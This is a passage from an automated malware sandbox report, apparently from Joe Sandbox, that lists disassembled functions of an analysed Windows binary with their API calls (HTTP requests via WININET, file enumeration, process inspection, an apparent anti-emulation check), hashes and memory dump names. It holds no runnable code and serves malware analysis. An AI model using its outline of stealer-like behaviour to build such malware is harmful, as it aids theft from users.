String ID:
API String ID: 941982115-0
Opcode ID: a4a82e4d1f7320b8c4c22d6fd0eff5f16b1eb4f12ba385fd47d7e4b0aee0928e
Instruction ID: 9f154334bd9fc2426f442818e87c32277c447543d81c26cb2c5971d2f655eed5
Opcode Fuzzy Hash: a4a82e4d1f7320b8c4c22d6fd0eff5f16b1eb4f12ba385fd47d7e4b0aee0928e
Instruction Fuzzy Hash: 75F03470A48209ABE704BBA19C0ABBE7B38EB44701F104A15B512EA6C1DFF55940DBA6

Function 009747B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63stringnetworkCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00974839
InternetCrackUrlA.WININET(00000000,00000000), ref: 00974849

Strings

<, xrefs: 009747C9

Memory Dump Source

Source File: 00000000.00000002.1932014519.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true

Associated: 00000000.00000002.1932000779.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A21000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A7F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000BCE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000D4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E2B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E51000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E69000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932724282.0000000000E6A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932873655.0000000001004000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932895785.0000000001005000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_970000_file.jbxd

Yara matches

Similarity

API ID: CrackInternetlstrlen
String ID: <
API String ID: 1274457161-4251816714
Opcode ID: 55ac4ce50b988cf27fba47c6d8c36a308b3999521053958d226b5bfb7a7aa1c0
Instruction ID: 5ab43f6e3555af5d9c697ce6cdd67c69d55831115c78d7bac0e85350ab59e71f
Opcode Fuzzy Hash: 55ac4ce50b988cf27fba47c6d8c36a308b3999521053958d226b5bfb7a7aa1c0
Instruction Fuzzy Hash: 8E214FB1D00208ABDF14EFA5E845BDD7B75FB44320F108626F919A72C0DB706A05CF92

Function 009851F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON

Download Yara Rule

APIs

Part of subcall function 0098A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0098A7E6

Part of subcall function 00976280: InternetOpenA.WININET(00990DFE,00000001,00000000,00000000,00000000), ref: 009762E1
Part of subcall function 00976280: StrCmpCA.SHLWAPI(?,0084EAD8), ref: 00976303
Part of subcall function 00976280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00976335
Part of subcall function 00976280: HttpOpenRequestA.WININET(00000000,GET,?,0084DFC0,00000000,00000000,00400100,00000000), ref: 00976385
Part of subcall function 00976280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 009763BF
Part of subcall function 00976280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 009763D1

StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00985228

Strings

ERROR, xrefs: 00985273
ERROR, xrefs: 0098521A

Memory Dump Source

Source File: 00000000.00000002.1932014519.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true

Associated: 00000000.00000002.1932000779.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A21000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A7F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000BCE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000D4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E2B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E51000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E69000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932724282.0000000000E6A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932873655.0000000001004000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932895785.0000000001005000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_970000_file.jbxd

Yara matches

Similarity

API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
String ID: ERROR$ERROR
API String ID: 3287882509-2579291623
Opcode ID: 20e93f205f6f0d31a67d8b7567a50c38fded392774018e3001d069016767e574
Instruction ID: 95fa10dad01220651a6103c1411fa4af265f52231e8c34fcbf13a7d9479cc3c0
Opcode Fuzzy Hash: 20e93f205f6f0d31a67d8b7567a50c38fded392774018e3001d069016767e574
Instruction Fuzzy Hash: C3113330900008A7EB18FF64DD92FED7379AF90300F408555F81A47692EF386B05C792

Function 00984F40 Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00988DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00988E0B

lstrcat.KERNEL32(?,00000000), ref: 00984F7A
lstrcat.KERNEL32(?,00991070), ref: 00984F97
lstrcat.KERNEL32(?,008492A8), ref: 00984FAB
lstrcat.KERNEL32(?,00991074), ref: 00984FBD

Part of subcall function 00984910: wsprintfA.USER32 ref: 0098492C
Part of subcall function 00984910: FindFirstFileA.KERNEL32(?,?), ref: 00984943

Part of subcall function 00984910: StrCmpCA.SHLWAPI(?,00990FDC), ref: 00984971
Part of subcall function 00984910: StrCmpCA.SHLWAPI(?,00990FE0), ref: 00984987
Part of subcall function 00984910: FindNextFileA.KERNEL32(000000FF,?), ref: 00984B7D
Part of subcall function 00984910: FindClose.KERNEL32(000000FF), ref: 00984B92

Memory Dump Source

Source File: 00000000.00000002.1932014519.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true

Associated: 00000000.00000002.1932000779.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A21000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A7F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000BCE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000D4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E2B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E51000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E69000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932724282.0000000000E6A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932873655.0000000001004000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932895785.0000000001005000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_970000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
String ID:
API String ID: 2667927680-0
Opcode ID: 324df16f766798f2a2b012db3362925502381a72311f4eed85dcecfffc461257
Instruction ID: f18525768b847ff09c741535e519d5f201dff20472c1d529d93ad9411fce8232
Opcode Fuzzy Hash: 324df16f766798f2a2b012db3362925502381a72311f4eed85dcecfffc461257
Instruction Fuzzy Hash: D621AD76D002046BCB54F774DC46FEE337CABD4700F404694B65993181EEB5A7C88BA2

Function 00980740 Relevance: 4.7, APIs: 3, Instructions: 217COMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(00000000,00849218), ref: 0098079A
StrCmpCA.SHLWAPI(00000000,00849108), ref: 00980866
StrCmpCA.SHLWAPI(00000000,00849298), ref: 0098099D

Part of subcall function 0098A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0098A7E6

Memory Dump Source

Source File: 00000000.00000002.1932014519.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true

Associated: 00000000.00000002.1932000779.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A21000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A7F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000BCE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000D4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E2B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E51000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E69000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932724282.0000000000E6A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932873655.0000000001004000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932895785.0000000001005000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_970000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy
String ID:
API String ID: 3722407311-0
Opcode ID: e43bdf41c836c8c3077a2e06519bf09dc90476de50fb7174339744b0104583d9
Instruction ID: 085a8224e908579ad3ccdf613ceff07069c1f4ee1e25f9879a79552ea7a48125
Opcode Fuzzy Hash: e43bdf41c836c8c3077a2e06519bf09dc90476de50fb7174339744b0104583d9
Instruction Fuzzy Hash: C3915575A102089FDB28FF64D995FEDB7B5BFD4300F508519E80A9B341DB34AA09CB92

Function 00980765 Relevance: 4.7, APIs: 3, Instructions: 197COMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(00000000,00849218), ref: 0098079A
StrCmpCA.SHLWAPI(00000000,00849108), ref: 00980866
StrCmpCA.SHLWAPI(00000000,00849298), ref: 0098099D

Part of subcall function 0098A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0098A7E6

Memory Dump Source

Source File: 00000000.00000002.1932014519.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true

Associated: 00000000.00000002.1932000779.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A21000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A7F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000BCE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000D4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E2B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E51000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E69000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932724282.0000000000E6A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932873655.0000000001004000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932895785.0000000001005000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_970000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy
String ID:
API String ID: 3722407311-0
Opcode ID: 028a091c2f3d9365c7e41bc7a84055679a81518fcd4506ff337175f5e9e5a801
Instruction ID: c4a2ba559b366b9f20da687903ca86b10c77c5707ccab83e6fd937e8f0eaac42
Opcode Fuzzy Hash: 028a091c2f3d9365c7e41bc7a84055679a81518fcd4506ff337175f5e9e5a801
Instruction Fuzzy Hash: 61815275A102089FDB28FF64C991FEDB7B6BFD4300F508519E8099B351DB34AA06CB92

Function 6C5C3060 Relevance: 4.5, APIs: 3, Instructions: 36timeCOMMON

Download Yara Rule

APIs

?Startup@TimeStamp@mozilla@@SAXXZ.MOZGLUE ref: 6C5C3095

Part of subcall function 6C5C35A0: InitializeCriticalSectionAndSpinCount.KERNEL32(6C64F688,00001000), ref: 6C5C35D5
Part of subcall function 6C5C35A0: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6C5C35E0
Part of subcall function 6C5C35A0: QueryPerformanceFrequency.KERNEL32(?), ref: 6C5C35FD
Part of subcall function 6C5C35A0: _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6C5C363F
Part of subcall function 6C5C35A0: GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6C5C369F
Part of subcall function 6C5C35A0: __aulldiv.LIBCMT ref: 6C5C36E4

?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C5C309F

Part of subcall function 6C5E5B50: QueryPerformanceCounter.KERNEL32(?,?,?,?,6C5E56EE,?,00000001), ref: 6C5E5B85
Part of subcall function 6C5E5B50: EnterCriticalSection.KERNEL32(6C64F688,?,?,?,6C5E56EE,?,00000001), ref: 6C5E5B90
Part of subcall function 6C5E5B50: LeaveCriticalSection.KERNEL32(6C64F688,?,?,?,6C5E56EE,?,00000001), ref: 6C5E5BD8
Part of subcall function 6C5E5B50: GetTickCount64.KERNEL32 ref: 6C5E5BE4

?InitializeUptime@mozilla@@YAXXZ.MOZGLUE ref: 6C5C30BE

Part of subcall function 6C5C30F0: QueryUnbiasedInterruptTime.KERNEL32 ref: 6C5C3127
Part of subcall function 6C5C30F0: __aulldiv.LIBCMT ref: 6C5C3140

Part of subcall function 6C5FAB2A: __onexit.LIBCMT ref: 6C5FAB30

Memory Dump Source

Source File: 00000000.00000002.1958551840.000000006C5C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5C0000, based on PE: true

Associated: 00000000.00000002.1958527510.000000006C5C0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958610390.000000006C63D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958645334.000000006C64E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958675490.000000006C652000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5c0000_file.jbxd

Similarity

API ID: Time$CriticalQuerySection$InitializePerformanceStamp@mozilla@@__aulldiv$AdjustmentCountCount64CounterEnterFrequencyInterruptLeaveNow@SpinStartup@SystemTickUnbiasedUptime@mozilla@@V12@___onexit_strnicmpgetenv
String ID:
API String ID: 4291168024-0
Opcode ID: f1a35aba86a93823b0c0093383443e55c15e563ff758173b68329a1d2d496c3a
Instruction ID: cac7d7eb4f2d4cef863a7c772e710718c67fc8a03a0eb8ca5bf42e0be1b219d5
Opcode Fuzzy Hash: f1a35aba86a93823b0c0093383443e55c15e563ff758173b68329a1d2d496c3a
Instruction Fuzzy Hash: 01F0D632E20748D6CB10FF759C815E6B374AFAB218F50D319E85863551FB2065D8838B

Function 00989470 Relevance: 4.5, APIs: 3, Instructions: 29COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000,?), ref: 00989484
K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 009894A5
CloseHandle.KERNEL32(00000000), ref: 009894AF

Memory Dump Source

Source File: 00000000.00000002.1932014519.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true

Associated: 00000000.00000002.1932000779.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A21000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A7F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000BCE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000D4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E2B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E51000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E69000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932724282.0000000000E6A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932873655.0000000001004000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932895785.0000000001005000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_970000_file.jbxd

Yara matches

Similarity

API ID: CloseFileHandleModuleNameOpenProcess
String ID:
API String ID: 3183270410-0
Opcode ID: 57d349e27f4b665f632df6cbd0e273613fece75764a90539aa7d7dd620a6dfa3
Instruction ID: 8b46cdd7f490c130f606298c7dcffc62dc8cfcbf18117da9609801038fe09298
Opcode Fuzzy Hash: 57d349e27f4b665f632df6cbd0e273613fece75764a90539aa7d7dd620a6dfa3
Instruction Fuzzy Hash: 45F08274D0020CFBDB04EFA4DC4AFED7778EB08700F004598BA0997290DAB4AE85CB91

Function 00971110 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0097112B
VirtualAllocExNuma.KERNEL32(00000000), ref: 00971132
ExitProcess.KERNEL32 ref: 00971143

Memory Dump Source

Source File: 00000000.00000002.1932014519.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true

Associated: 00000000.00000002.1932000779.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A21000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A7F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000BCE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000D4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E2B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E51000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E69000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932724282.0000000000E6A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932873655.0000000001004000.00000040.00000001.01000000.00000003.sdmpDownload File
